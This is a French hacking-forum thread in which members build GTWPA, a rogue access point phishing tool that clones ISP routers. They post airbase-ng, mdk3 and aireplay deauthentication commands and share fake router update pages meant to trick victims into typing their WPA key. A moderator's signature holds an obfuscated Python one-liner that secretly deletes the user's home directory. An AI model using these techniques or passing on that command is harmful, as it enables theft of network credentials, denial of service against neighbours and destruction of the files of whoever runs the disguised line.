Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#201 07-11-2010 17:33:53

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [PRO]GTWPA (Developpers)

Bon alors je viens de tenter ça:
-création d'un réseau wpa avec hostapd sans lui préciser la clé
-lancement de airbase et configuration des iptables

airbase-ng -c 11 -e Livebox-xxxx -a 00:C0:CA:35:CA:C8 -0 mon0

(00:C0:CA:35:CA:C8 et ma carte alpha servant de rogue)
-le vrai réseau et remplacé par mon fake

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 00:C0:CA:35:CA:C8    0 100      149        0    0  11  54   WPA2 CCMP   MGT  Livebox-xxxx

-connexion de mon second pc a mon fake ap(la windows lui demande de rentrer la clé)
-je rentre la clé et je peux surfer.(la conexion et très lente par contre)

Il y a un détail qui cloche dans tout sa,ma livebox et pas en WPA/2 MGT mais en WPA  TKIP je l'est changer en tkip pour faire des tests airbase-ng/tkiptun-ng (qui n'ont pas aboutis).

L'option -0 de airbase doit jouer la dessus.

Ce qui reste a faire sa serait de faire en sorte d'avoir une connexion plus rapide.
Et voir si on peut lancer apache wireshark etc... sur le réseau pour grabber la clé comme on le fais en open

Testez chez vous hostapd et airbase,si on et motivé on pourra faire de belles choses avec certains membres de ce forum je pense:P et qui c'est faire une nouvelle version de atxwpa ou gtwpa.:D

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#202 09-11-2010 15:36:09

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

raylook a écrit :

Salut !!
As tu modifier le fichier GTWPA_FUNCTIONS.py ? remet le fichier comme c'etait avant avec l'interface at0 si tu l'avais modifier  smile

Je pense qu'il faut modifier le code source du fichier GTWPA_FUNCTIONS.py. De la ligne 155 à 157, il faut que tu remplaces at0 par la vrai interface wink

Je viens d'éditer mon message ^^ Personne ne sera embrouillé par ma connerie ^^

@Carto : Salut. Il faudrait que tu modifie les fakes panels d'origine dans l'archive par les miennes :
Freebox.rar
Livebox.rar
Neufbox SFR.rar
Numéricable.rar

Qu'en penses-tu ? Faut-il faire les fakes panels de speedtouch ou autre ? Il faudrait que tu rajoute dans le cript le lancement de Mysql en plus d'apache

@koala : j'essaierai la création de rogue en WPA plus tard, surement en fin de semaine, je fais le pont wink

Dernière modification par Dack (09-11-2010 15:37:25)

Hors Ligne

#203 13-12-2010 11:42:24

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Re : [PRO]GTWPA (Developpers)

Bonjour, je me suis intérréssé depuis quelque semaine à votre dicussion, j'ai cherché le script, j'ai trouvé le script version 0,11, et j'ai eu differente erreur.
corriger moi si je me trompe, on peut le lancer a partir de n'importe quel dossier puisqu'il y a une phase d'installation? Ensuite la toute première erreur que j'ai eu été les caractère spéciaux (à, é, è) non pris en charge par le script lors de l'execution (bon sa j'ai résolu), mais un problème tout simple persiste, il me dis qu'il y a un problème avec la ligne "  intro="/n  "
alors la je ne vois pas du tout quoi faire, si vous avez un remède a me proposer, je suis preneur.
Merci d'avance.

Ps: avez vous fais une version supérieur a la 0,11?

Hors Ligne

#204 08-01-2011 08:37:20

3vil
N00b
Inscription : 08-01-2011
Messages : 2

Re : [PRO]GTWPA (Developpers)

Bonjour,
Je vous félicite pour votre travail wink

J'ai testé votre script et il marche plutôt bien.
La fake AP est crée en non sécurisé et si je me connecte manuellement dessus, je vois la fausse page d'update.
Donc on peut dire que la première étape est un succès.

Si je clone ma real AP, ma fake AP devient invisible dans la liste des reseaux wifi, même si le signal de ma fake AP est plus puissant que celui de ma real AP.
A mon avis, sachant que les deux APs sont identiques au niveau du ESSID et de l'adresse MAC, Windows doit choisir d'afficher celui qui est sécurisé...

La deuxième étape est de pouvoir rendre la real AP hors service.
Et j'ai beau essayer plusieurs fois l'utilisation du tool mdk3, je n'ai pas réussie à "tuer" ma real AP (freebox v5) !
Donc  je reste bloqué sur cette étape sad

Existe t'il un autre tool que mdk3 pour crasher une AP ?

Je présise que si je débranche ma freebox, ma fake AP devient visible dans la liste des reseaux wifi, et je dois me connecter manuellement dessus (ce qui est normal).

Hors Ligne

#205 08-01-2011 12:58:00

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [PRO]GTWPA (Developpers)

Salut wink si tu flood assez longtemps l'ap réel normalement le fake remplace l'open si ta pris les paramètres du vrai AP après l'avoir floodé.

Hors Ligne

#206 08-01-2011 13:42:54

3vil
N00b
Inscription : 08-01-2011
Messages : 2

Re : [PRO]GTWPA (Developpers)

J'ai essayé plusieus fois l'attaque du "mdk3 mon0 a -a AP_MAC" pendant plus de 30 min et elle reste en vie -_-

Hors Ligne

#207 08-01-2011 13:46:36

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [PRO]GTWPA (Developpers)

Tentes de couplé avec aireplay wink

aireplay -0 0 -a bssid
mdk3 mon0 p -c canal -t bssid -e essid -s 150

sa marche bien chez moi

Dernière modification par koala (08-01-2011 13:51:45)

Hors Ligne

#208 08-01-2011 14:21:59

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [PRO]GTWPA (Developpers)

Le mieux c'est de tenter la reconnexion automatique en WEP si le réseau et en WPA et en open si le réseau et en WEP car pour le moment je ne vois pas d'autre solution.un membre du forum a d'ailleurs testé chez lui et sa marche,je l'ai aussi testé sa a marché(mon pc cible étant a coté de l'attaquant).Avec une plus grande distance je doute que sa marche.

Hors Ligne

#209 20-01-2011 15:36:49

KrIs5
Membre
Inscription : 20-01-2011
Messages : 10

Re : [PRO]GTWPA (Developpers)

Salut,

Je suis nouveau sur le forum, et je m'interese de pret a votre projet que je trouve super et je vous felicite pour le boulot que vous avais accomplis!

Je peux filer un coup de main en python, html, php, sql

Hors Ligne

#210 20-01-2011 21:06:00

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : [PRO]GTWPA (Developpers)

Bonsoir !
Je suis entrain de faire une (petite, ne vous vexez pas smile) correction orthographique des fausses pages.

Dack, je te file les fichiers corrigés et tu gères ou je les met en ligne comme tu as fait ?

[edit:]  Les messages sont clairs, correctement orthographiés, mais le style n'est pas celui auquel on s'attend en lisant une page écrite par un commercial. Dois-je (et puis-je) modifier quelques passages ?

Il me semble qu'avec un style commercial, on peut plus facilement parvenir à nos fins.

Dernière modification par spawn (20-01-2011 21:16:49)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#211 21-01-2011 19:58:23

KrIs5
Membre
Inscription : 20-01-2011
Messages : 10

Re : [PRO]GTWPA (Developpers)

Ou peut on avoir les sources (si il y en a ) ??
Merci

Hors Ligne

#212 22-01-2011 12:02:40

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Re : [PRO]GTWPA (Developpers)

Cherche bien dans ce topic et sur le forum, tu trouveras toutes les sources des différents scripts de rogue AP qui ont été créés.

Hors Ligne

#213 28-07-2012 10:41:10

KrIs5
Membre
Inscription : 20-01-2011
Messages : 10

Re : [PRO]GTWPA (Developpers)

Bonjour,
Je voulais vous faire part de mon expérience sur une Freebox V6:

- Création Fake AP     => Ok
- DHCP, Apache etc    => Ok ( D'ailleurs si qqn le souhaite, j'ai fait une page Free, elle ne stocke pas la clé WPA dans une base de donnée mais dans un fichier texte )

Le problème arrive...

La déconnexion du client:
Alors lorsque je lance la fake AP sur le même canal, même BSSID, la véritable Freebox déconne la victime n'a plus de connexion internet, mais il est toujours connecte à la Freebox...
Si à ça je rajoute un petit coup de mdk3 avec l'option DOS ( -a ) rien ne change mis a part que si il se déconnecte manuellement il lui devient impossible de se reconnecter (et donc dans ce cas il pourrait, je dis bien pourrait, se connecter sur la fake AP)

Voila je pense que le problème est le même pour tout le monde:
Comment réussir à faire connecter la victime sur la Fake AP ???

Dernière modification par KrIs5 (28-07-2012 10:43:12)

Hors Ligne

#214 28-07-2012 11:15:46

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Salut KrIs5 !

C'est un peu la pierre d'achoppement du projet ... Il n'existe à ce jour aucune méthode fiable pour forcer la connexion d'un client sur une Fake AP plutôt que sur l'originale.

L'idée principale était la suivante : planter la box, et le client se reconnecte sur notre FakeAP. Or, les nouvelles boxes résistent désormais aux outils comme MDK3 & Cie ...

Tout fonctionne donc en théorie, exception faite de ce point-là ... D'ou le fait que le projet ait été mis sur pause.

PS: Cela étant je me suis amélioré en python depuis la dernière version donc je pourrais re-coder mon script original avec une interface graphique et quelques options supplémentaires, mais je ne suis pas sur que ça vaille le coup dans le mesure ou le principal problème n'a pas de solution wink


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#215 28-07-2012 11:27:42

KrIs5
Membre
Inscription : 20-01-2011
Messages : 10

Re : [PRO]GTWPA (Developpers)

Je me rend compte effectivement qu'il n'y a pas de solution qui tienne la route comme tu peux me le confirmer... La Freebox n'a jamais lâchée, même pas un peu et pourtant avec mdk3 je suis allé jusque 15 000 stations connectés...
Je ne vois qu une seul solution... Couper le courant !!! lol
Bon en tout cas je surveillerai ce projet qui pourrait je pense être très prometteur..

Hors Ligne

#216 28-07-2012 11:49:31

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Je continue de bosser sur le code de temps à autre, mais je suis surtout quelques projets qui pourraient aider à forcer la reconnexion d'un client de façon autormatique ;-)

Si certains ont des idées, je suis preneur !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#217 04-11-2013 22:48:27

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : [PRO]GTWPA (Developpers)

quelles sont tes nouvelles?

Hors Ligne

#218 05-11-2013 15:52:20

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : [PRO]GTWPA (Developpers)

ffoo31, ce topic date un peu, gtwpa n'est plus en développement.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
203 62860 07-10-2012 14:39:37 par 39max
Je recherche GTWPA par Linquant
4 2111 14-04-2011 12:25:15 par Linquant
0 6167 08-12-2010 22:50:28 par M1ck3y
GTWPA par sardineeMule
4 2210 27-12-2008 16:46:11 par sardineeMule

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.065 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]